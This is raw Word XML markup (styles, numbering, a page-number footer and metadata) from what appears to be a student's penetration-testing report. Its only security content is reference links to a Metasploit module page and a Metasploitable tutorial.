            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="04AAB860" wp14:editId="3F5130B8">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="margin">
                <wp:align>right</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>635</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="153035" cy="175260"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="11418797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3035" cy="175260"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="0">
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:style>
                      <a:lnRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:lnRef>
                      <a:fillRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:fillRef>
                      <a:effectRef idx="0">
                        <a:scrgbClr r="0" g="0" b="0"/>
                      </a:effectRef>
                      <a:fontRef idx="minor"/>
                    </wps:style>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="1462B75C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
                          <w:pPr>
                            <w:pStyle w:val="Footer"/>
                            <w:rPr>
                              <w:lang w:val="lt-LT"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:rStyle w:val="PageNumber"/>
                              <w:color w:val="000000"/>
                              <w:lang w:val="lt-LT"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="begin"/>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:rStyle w:val="PageNumber"/>
                              <w:color w:val="000000"/>
                              <w:lang w:val="lt-LT"/>
                            </w:rPr>
                            <w:instrText xml:space="preserve"> PAGE </w:instrText>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:rStyle w:val="PageNumber"/>
                              <w:color w:val="000000"/>
                              <w:lang w:val="lt-LT"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="separate"/>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:rStyle w:val="PageNumber"/>
                              <w:color w:val="000000"/>
                              <w:lang w:val="lt-LT"/>
                            </w:rPr>
                            <w:t>1</w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:rStyle w:val="PageNumber"/>
                              <w:color w:val="000000"/>
                              <w:lang w:val="lt-LT"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="end"/>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rect w14:anchorId="04AAB860" id="Rectangle 2" o:spid="_x0000_s1027" style="position:absolute;margin-left:-39.15pt;margin-top:.05pt;width:12.05pt;height:13.8pt;z-index:251658240;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" o:allowincell="f" filled="f" stroked="f" strokeweight="0">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="1462B75C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
                    <w:pPr>
                      <w:pStyle w:val="Footer"/>
                      <w:rPr>
                        <w:lang w:val="lt-LT"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="PageNumber"/>
                        <w:color w:val="000000"/>
                        <w:lang w:val="lt-LT"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="begin"/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="PageNumber"/>
                        <w:color w:val="000000"/>
                        <w:lang w:val="lt-LT"/>
                      </w:rPr>
                      <w:instrText xml:space="preserve"> PAGE </w:instrText>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="PageNumber"/>
                        <w:color w:val="000000"/>
                        <w:lang w:val="lt-LT"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="separate"/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="PageNumber"/>
                        <w:color w:val="000000"/>
                        <w:lang w:val="lt-LT"/>
                      </w:rPr>
                      <w:t>1</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rStyle w:val="PageNumber"/>
                        <w:color w:val="000000"/>
                        <w:lang w:val="lt-LT"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="end"/>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="square" anchorx="margin"/>
            </v:rect>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val="lt-LT"/>
      </w:rPr>
      <w:t xml:space="preserve">By </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val="lt-LT"/>
      </w:rPr>
      <w:t>a student: Ihor Milevskyi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2F4D79" w14:textId="77777777" w:rsidR="00087DA5" w:rsidRDefault="00087DA5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4F8AE6AC" w14:textId="77777777" w:rsidR="00087DA5" w:rsidRDefault="00087D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AE4D05"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB363DF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CC75703"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8BBE7980"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:pStyle w:val="Heading1"/>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57C570D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D0C4727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62E772D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C494F1BA"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="MAG-2"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="3240" w:hanging="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="3960" w:hanging="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="1080"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="1080"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="6840" w:hanging="1440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="7560" w:hanging="1440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="8640" w:hanging="1800"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7F664253"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="67C420D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num w:numId="1" w16cid:durableId="2085684899">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="472253350">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2113738915">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="992757313">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="107578816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0F89"/>
    <w:rsid w:val="00087DA5"/>
    <w:rsid w:val="00137AB6"/>
    <w:rsid w:val="00516075"/>
    <w:rsid w:val="00527458"/>
    <w:rsid w:val="007736FE"/>
    <w:rsid w:val="00790588"/>
    <w:rsid w:val="00970F89"/>
    <w:rsid w:val="00C45EE1"/>
    <w:rsid w:val="00F36CBF"/>
    <w:rsid w:val="00FF21E9"/>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99C994"/>
  <w15:docId w15:val="{E6D838B9-DB52-4B67-9A24-7223B5C7D6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DejaVu Sans"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>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next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:pageBreakBefore/>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="2127"/>
      </w:tabs>
      <w:spacing w:before="280" w:after="120" w:line="480" w:lineRule="auto"/>
      <w:ind w:left="360" w:right="284"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="30"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="200"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:eastAsia="DejaVu Sans" w:hAnsi="Liberation Serif" w:cs="DejaVu Sans"/>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Arial" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="30"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri" w:hAnsi="Calibri Light" w:cs="DejaVu Sans"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="2"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Bullets">
    <w:name w:val="Bullets"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="OpenSymbol" w:eastAsia="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol"/>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w:hAnsi="Liberation Sans" w:cs="FreeSans"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="DejaVu Sans"/>
    </w:r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customStyle="1" w:styleId="caption1">
    <w:name w:val="caption1"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="FreeSans"/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="MAG-01">
    <w:name w:val="MAG-01"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="MAG-2">
    <w:name w:val="MAG-2"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
      <w:contextualSpacing w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:szCs w:val="28"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="HeaderandFooter">
    <w:name w:val="Header and Footer"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:pPr>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri" w:hAnsi="Calibri Light" w:cs="DejaVu Sans"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="2"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FrameContents">
    <w:name w:val="Frame Contents"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>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paragraph" w:customStyle="1" w:styleId="western">
    <w:name w:val="western"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00FA24EC"/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="0"/>
      <w:spacing w:beforeAutospacing="1" w:after="115"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
      <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F36CB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hyperlink" Target="https://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nvd.nist.gov/"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medium.com/@jbtechmaven/penetration-testing-series-hacking-metasploitable-2-by-exploiting-vnc-port-5900-188f7cc44b8"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footer" Target="footer2.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27</Pages>
  <Words>16686</Words>
  <Characters>9512</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>79</Lines>
  <Paragraphs>52</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>26146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Sarunas Grigaliunas</dc:creator>
  <cp:keywords>docId 811F525FA6CFE3E96040E7AF9025C8CF</cp:keywords>
  <dc:description/>
  <cp:lastModifiedBy>Игорь Милевский</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-19T18:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-30T18:22:00Z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Context">
    <vt:lpwstr>{"goals":[],"domain":"general","emotions":[],"dialect":"american"}</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="grammarly_documentId">
    <vt:lpwstr>documentId_1138</vt:lpwstr>
  </property>
</Properties>
</file>